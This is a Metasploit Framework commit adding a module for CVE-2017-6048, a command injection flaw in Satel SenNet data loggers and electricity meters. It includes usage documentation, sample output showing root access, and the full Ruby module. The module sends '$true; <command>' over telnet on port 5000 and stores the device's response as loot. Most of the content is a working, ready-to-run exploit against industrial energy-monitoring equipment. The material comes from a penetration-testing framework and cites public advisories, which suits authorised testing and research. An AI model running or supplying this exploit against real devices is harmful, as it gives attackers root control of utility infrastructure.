Land #8205, Add Satel SenNet Command Exec Module

bug/bundler_fix
Brent Cook 2017-06-25 18:01:44 -05:00
commit 05c72214ae
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 99 additions and 0 deletions

View File

@ -0,0 +1,28 @@
This module exploits an OS Command Injection vulnerability in Satel SenNet Data Logger and Electricity Meters to perform arbitrary command execution as 'root'.
The following versions of SenNet Data Logger and Electricity Meters, monitoring platforms, are affected:
1. SenNet Optimal DataLogger V5.37c-1.43c and prior,
2. SenNet Solar Datalogger V5.03-1.56a and prior, and
3. SenNet Multitask Meter V5.21a-1.18b and prior.
## Verification Steps
1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
```
msf > use auxiliary/scanner/telnet/satel_cmd_exec
msf auxiliary(satel_cmd_exec) > set rhosts 1.3.3.7
msf auxiliary(satel_cmd_exec) > run
[*] 1.3.3.7:5000 - Sending command now - id;
[+] 1.3.3.7:5000 - uid=0(root) gid=0(root)
[+] 1.3.3.7:5000 - File saved in: /root/.msf4/loot/20000000000003_1.3.3.7_cmdexeclog_12345.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,71 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Telnet
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability',
'Description' => %q{
This module exploits an OS Command Injection vulnerability in Satel Iberia SenNet Data Loggers & Electricity Meters
to perform arbitrary command execution as 'root'.
},
'References' =>
[
[ 'CVE', '2017-6048' ],
[ 'URL', 'https://ipositivesecurity.com/2017/04/07/sennet-data-logger-appliances-and-electricity-meters-multiple-vulnerabilties/' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-131-02' ]
],
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
],
'DisclosureDate' => 'Apr 07, 2017',
'License' => MSF_LICENSE,
'DefaultOptions' => { 'VERBOSE' => true })
)
register_options(
[
Opt::RPORT(5000),
OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30]),
OptString.new('CMD', [true, 'Command(s) to run', 'id'])
], self.class
)
deregister_options('USERNAME', 'PASSWORD')
end
def run_host(ip)
to = (datastore['TIMEOUT'].zero?) ? 30 : datastore['TIMEOUT']
begin
::Timeout.timeout(to) do
command = datastore['CMD']
inject = "$true; #{command}"
res = connect
print_status("Sending command now - #{command}")
sock.puts(inject)
data = sock.get_once(-1, to)
print_good("#{data}")
loot_name = 'cmd-exec-log'
loot_type = 'text/plain'
loot_desc = 'Satel SenNet CMD Exec Dump'
p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)
print_good("File saved in: #{p}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Connection Failed...")
return false
ensure
disconnect
end
end
end